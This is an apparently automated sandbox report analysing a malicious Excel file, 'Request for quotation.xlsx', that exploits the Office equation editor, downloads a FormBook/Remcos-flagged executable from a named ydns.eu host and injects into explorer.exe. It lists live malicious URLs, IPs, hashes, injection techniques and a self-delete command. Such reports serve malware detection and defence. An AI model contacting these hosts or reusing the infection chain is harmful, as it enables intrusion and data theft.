          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000008.00000002.2391506511.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000002.2391506511.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.2251278805.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000002.2391506511.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Windows\SysWOW64\cmd.exeCode function: _wcsicmp,GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,memmove,GetLocaleInfoW,GetTimeFormatW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetDateFormatW,realloc,GetDateFormatW,_wcsicmp,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,memmove,GetSystemTime,SystemTimeToFileTime,memmove,GetLastError,realloc,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A564E44 GetSystemTime,SystemTimeToFileTime,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0038BA60 GetUserNameA,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55D3B3 GetVersion,
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Disable or Modify Tools1Credential API Hooking1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information31Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSSystem Information Discovery126Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRootkit1LSA SecretsSecurity Software Discovery331SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading111Cached Domain CredentialsVirtualization/Sandbox Evasion3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion3DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection612Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 321122 Sample: Request for quotation.xlsx Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 54 Multi AV Scanner detection for domain / URL 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus detection for URL or domain 2->58 60 16 other signatures 2->60 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 37 14 2->15         started        process3 dnsIp4 42 thdyneverwalkachinese2loneinlifekthfnp.ydns.eu 103.141.138.87, 49167, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->42 36 C:\Users\user\AppData\Local\...\winlog[1].exe, PE32 10->36 dropped 38 C:\Users\Public\vbc.exe, PE32 10->38 dropped 70 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->70 17 vbc.exe 1 5 10->17         started        40 C:\Users\...\~$Request for quotation.xlsx, data 15->40 dropped file5 signatures6 process7 signatures8 46 Antivirus detection for dropped file 17->46 48 Multi AV Scanner detection for dropped file 17->48 50 Machine Learning detection for dropped file 17->50 52 2 other signatures 17->52 20 vbc.exe 17->20         started        23 vbc.exe 17->23         started        25 vbc.exe 17->25         started        process9 signatures10 62 Modifies the context of a thread in another process (thread injection) 20->62 64 Maps a DLL or memory area into another process 20->64 66 Sample uses process hollowing technique 20->66 68 Queues an APC in another process (thread injection) 20->68 27 explorer.exe 20->27 injected process11 dnsIp12 44 www.segredosdocopywriting.com 172.67.181.41, 49168, 80 CLOUDFLARENETUS United States 27->44 72 System process connects to network (likely due to code injection or exploit) 27->72 31 cmd.exe 27->31         started        signatures13 process14 signatures15 74 Modifies the context of a thread in another process (thread injection) 31->74 76 Maps a DLL or memory area into another process 31->76 78 Tries to detect virtualization through RDTSC time measurements 31->78 34 cmd.exe 31->34         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Request for quotation.xlsx33%VirustotalBrowse
          Request for quotation.xlsx23%ReversingLabsWin32.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%AviraTR/AD.Swotter.yiimo
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe100%AviraTR/AD.Swotter.yiimo
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe33%ReversingLabsByteCode-MSIL.Backdoor.Remcos
          C:\Users\Public\vbc.exe33%ReversingLabsByteCode-MSIL.Backdoor.Remcos

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          thdyneverwalkachinese2loneinlifekthfnp.ydns.eu7%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exe2%VirustotalBrowse
          http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exe100%Avira URL Cloudmalware
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.segredosdocopywriting.com/ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ980%Avira URL Cloudsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.%s.com0%URL Reputationsafe
          http://www.%s.com0%URL Reputationsafe
          http://www.%s.com0%URL Reputationsafe
          http://www.%s.com0%URL Reputationsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.segredosdocopywriting.com
          		172.67.181.41
          		truetrue
            		unknown
            thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
            		103.141.138.87
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exetrue
            • 2%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://www.segredosdocopywriting.com/ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.windows.com/pctv.explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpfalse
              		high
              http://investor.msn.comexplorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpfalse
                		high
                http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmpfalse
                    		high
                    http://wellformedweb.org/CommentAPI/explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmpfalse
                      		high
                      http://investor.msn.com/explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpfalse
                        		high
                        http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.%s.comexplorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		low
                        http://www.piriform.com/ccleanerexplorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmpfalse
                          		high
                          http://computername/printers/printername/.printerexplorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://www.%s.comPAvbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		low
                          http://%s.comexplorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		low
                          http://www.hotmail.com/oeexplorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpfalse
                            		high
                            http://treyresearch.netexplorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmpfalse
                              		high
                              http://servername/isapibackend.dllexplorer.exe, 00000008.00000000.2258936880.0000000004F30000.00000002.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		low

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              103.141.138.87
                              		unknownViet Nam
                              		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
                              172.67.181.41
                              		unknownUnited States
                              		13335CLOUDFLARENETUStrue

                              General Information

                              Joe Sandbox Version:31.0.0 Red Diamond
                              Analysis ID:321122
                              Start date:20.11.2020
                              Start time:11:26:18
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 11m 16s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:Request for quotation.xlsx
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:1
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLSX@13/3@2/2
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 16.4% (good quality ratio 15.6%)
                              • Quality average: 70.9%
                              • Quality standard deviation: 29.4%
                              HCA Information:
                              • Successful, ratio: 98%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .xlsx
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                              • TCP Packets have been reduced to 100
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtCreateFile calls found.
                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              11:27:18API Interceptor112x Sleep call for process: EQNEDT32.EXE modified
                              11:27:22API Interceptor285x Sleep call for process: vbc.exe modified
                              11:28:11API Interceptor200x Sleep call for process: cmd.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              103.141.138.878YPssSkVtu.rtfGet hashmaliciousBrowse
                              • mndyneverwalkachinese2loneinlifemnkngr.ydns.eu/chnsfrnd2/winlog.exe

                              Domains

                              No context

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNTyre Pricelist.xlsxGet hashmaliciousBrowse
                              • 103.125.191.5
                              2eD17GZuWs.exeGet hashmaliciousBrowse
                              • 103.125.191.5
                              Unique food order.xlsxGet hashmaliciousBrowse
                              • 103.125.191.5
                              tt payment proof.xlsxGet hashmaliciousBrowse
                              • 103.125.191.187
                              TIE-3735-2020.xlsxGet hashmaliciousBrowse
                              • 103.125.191.229
                              payslip.s.xlsxGet hashmaliciousBrowse
                              • 103.125.191.187
                              Telex-relase.xlsxGet hashmaliciousBrowse
                              • 103.141.138.120
                              Y0L60XAhvo.rtfGet hashmaliciousBrowse
                              • 103.141.138.122
                              d6pj421rXA.exeGet hashmaliciousBrowse
                              • 103.139.45.59
                              8YPssSkVtu.rtfGet hashmaliciousBrowse
                              • 103.141.138.87
                              PI098763556299.xlsxGet hashmaliciousBrowse
                              • 103.125.191.229
                              PIT12425009.xlsxGet hashmaliciousBrowse
                              • 103.125.191.229
                              wIeFid8p7Q.exeGet hashmaliciousBrowse
                              • 103.125.189.164
                              Dell ordine-09362-9-11-2020.exeGet hashmaliciousBrowse
                              • 103.139.45.59
                              shipping documents.xlsxGet hashmaliciousBrowse
                              • 103.133.108.6
                              shipping documents.xlsxGet hashmaliciousBrowse
                              • 103.133.108.6
                              EES RFQ 60-19__pdf.exeGet hashmaliciousBrowse
                              • 103.114.107.156
                              Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                              • 103.141.138.122
                              Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                              • 103.141.138.122
                              Z08LsyTAN6.exeGet hashmaliciousBrowse
                              • 103.125.189.164
                              CLOUDFLARENETUSMV TBN.exeGet hashmaliciousBrowse
                              • 104.28.5.151
                              PO 20-11-2020.ppsGet hashmaliciousBrowse
                              • 172.67.22.135
                              Quotation ATB-PR28500KINH.exeGet hashmaliciousBrowse
                              • 1.1.1.1
                              23prRlqeGr.exeGet hashmaliciousBrowse
                              • 104.23.98.190
                              RFQ-HSO-76411758-1.jarGet hashmaliciousBrowse
                              • 104.20.23.46
                              RFQ-HSO-76411758-1.jarGet hashmaliciousBrowse
                              • 104.20.22.46
                              iG9YiwEMru.exeGet hashmaliciousBrowse
                              • 104.27.132.115
                              Avion Quotation Request.docGet hashmaliciousBrowse
                              • 104.22.54.159
                              SUSPENSION LETTER ON SIM SWAP.pdf.exeGet hashmaliciousBrowse
                              • 172.67.131.55
                              Quotation ATB-PR28500KINH.exeGet hashmaliciousBrowse
                              • 1.1.1.1
                              SaXJC2CZ8m.exeGet hashmaliciousBrowse
                              • 104.27.133.115
                              PO91666. pdf.exeGet hashmaliciousBrowse
                              • 172.67.143.180
                              BT2wDapfoI.exeGet hashmaliciousBrowse
                              • 104.23.98.190
                              ara.exeGet hashmaliciousBrowse
                              • 172.65.200.133
                              ORDER FORM DENK.exeGet hashmaliciousBrowse
                              • 104.18.47.150
                              araiki.exeGet hashmaliciousBrowse
                              • 172.65.200.133
                              arailk.exeGet hashmaliciousBrowse
                              • 172.65.200.133
                              https://filmconsultancy.bindwall.ml/mike@filmconsultancy.comGet hashmaliciousBrowse
                              • 104.26.4.196
                              https://trondiamond.co/OMMOM/OM9u8Get hashmaliciousBrowse
                              • 104.16.18.94
                              https://t.e.vailresorts.com/r/?id=h1bac782d,59eb410,55e61f1&VRI_v73=96008558&cmpid=EML_OPENDAYS_RESO_000_OK_SR_REN1Y_000000_TG0001_20201118_V00_EX001_LOCA_ANN_00000_000Get hashmaliciousBrowse
                              • 104.16.149.64

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:downloaded
                              Size (bytes):962560
                              Entropy (8bit):4.317508777163088
                              Encrypted:false
                              SSDEEP:12288:wG0EuC4WRkmWF4fX8Lp1H24SYYSY+hbsBIZG1Xc:e04W62RSPsyZF
                              MD5:221E46C09EB3440BEB5A2256211C3262
                              SHA1:0F056342E6DFFB5C4F3CDD1D7BD4AC5427175BE0
                              SHA-256:6CA1B2240B6D547ADA7051DC4D0C198517436943FFD7A4D1EEBC0BCA19AC038A
                              SHA-512:48E479701738109D705F620F40E1D264BD22DACB78DE6B8C64F693AE09ED1C02A61C93F751C4D1710ECC4539493D2A2308EC0B86147D8E49B799E7D7FD28073B
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 33%
                              Reputation:low
                              IE Cache URL:http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exe
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G._.............................L... ...`....@.. ....................................@..................................L..K....`...}........................................................................... ............... ..H............text....,... ...................... ..`.rsrc....}...`...~...0..............@..@.reloc..............................@..B.................L......H........R..<@...........................................................0..?........(....8....8........E........8....*.(.... .....:....& ....8......0..M....... ........8........E....".......8....s"..... ....(....:....&8....*..o....8........0.......... ........8........E....e...E...%...d.......8`....{....(.... ....(....:....&8.....9:... ....(....:....& ....8.....{....:....8....8.... ....8....*..(.... ....(....:l...& ....8a.......0..5....... ........8........E.................
                              C:\Users\user\Desktop\~$Request for quotation.xlsx
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):330
                              Entropy (8bit):1.4377382811115937
                              Encrypted:false
                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                              Malicious:true
                              Reputation:moderate, very likely benign file
                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              C:\Users\Public\vbc.exe
                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):962560
                              Entropy (8bit):4.317508777163088
                              Encrypted:false
                              SSDEEP:12288:wG0EuC4WRkmWF4fX8Lp1H24SYYSY+hbsBIZG1Xc:e04W62RSPsyZF
                              MD5:221E46C09EB3440BEB5A2256211C3262
                              SHA1:0F056342E6DFFB5C4F3CDD1D7BD4AC5427175BE0
                              SHA-256:6CA1B2240B6D547ADA7051DC4D0C198517436943FFD7A4D1EEBC0BCA19AC038A
                              SHA-512:48E479701738109D705F620F40E1D264BD22DACB78DE6B8C64F693AE09ED1C02A61C93F751C4D1710ECC4539493D2A2308EC0B86147D8E49B799E7D7FD28073B
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 33%
                              Reputation:low
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G._.............................L... ...`....@.. ....................................@..................................L..K....`...}........................................................................... ............... ..H............text....,... ...................... ..`.rsrc....}...`...~...0..............@..@.reloc..............................@..B.................L......H........R..<@...........................................................0..?........(....8....8........E........8....*.(.... .....:....& ....8......0..M....... ........8........E....".......8....s"..... ....(....:....&8....*..o....8........0.......... ........8........E....e...E...%...d.......8`....{....(.... ....(....:....&8.....9:... ....(....:....& ....8.....{....:....8....8.... ....8....*..(.... ....(....:l...& ....8a.......0..5....... ........8........E.................

                              Static File Info

                              General

                              File type:CDFV2 Encrypted
                              Entropy (8bit):7.99662784202308
                              TrID:
                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                              File name:Request for quotation.xlsx
                              File size:2205696
                              MD5:109bae1300099a20ad3df28d09095bf1
                              SHA1:dd2c886624df876a75389a5690cf55fd59a0b217
                              SHA256:1154f054c7344a07eed067053d6f3cfec18bc3aee5078e94c3a77bba3827bb06
                              SHA512:a78807b0bc51dd6afa480b2f5321b2bb76356e0c7d9cd421e4a70215ec1479f3d69edeefc8a84b207ba73ba4335afbc697c612d4f64635420ac43e6bdf0c0227
                              SSDEEP:49152:xNGiwgGDTltv9bFH9dsa6H26QjHmeu+YsS4QOwu7CUDKf9VqtBN:xwiwhVXyXxInty4bsNfLqtBN
                              File Content Preview:........................>..................."...........................................................................z.......|.......~...............z.......|.......~...............z.......|.......~......................................................

                              File Icon

                              Icon Hash:e4e2aa8aa4b4bcb4

                              Static OLE Info

                              General

                              Document Type:OLE
                              Number of OLE Files:1

                              OLE File "Request for quotation.xlsx"

                              Indicators

                              Has Summary Info:False
                              Application Name:unknown
                              Encrypted Document:True
                              Contains Word Document Stream:False
                              Contains Workbook/Book Stream:False
                              Contains PowerPoint Document Stream:False
                              Contains Visio Document Stream:False
                              Contains ObjectPool Stream:
                              Flash Objects Count:
                              Contains VBA Macros:False

                              Streams

                              Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                              General
                              Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                              File Type:data
                              Stream Size:64
                              Entropy:2.73637206947
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                              Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                              Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                              General
                              Stream Path:\x6DataSpaces/DataSpaceMap
                              File Type:data
                              Stream Size:112
                              Entropy:2.7597816111
                              Base64 Encoded:False
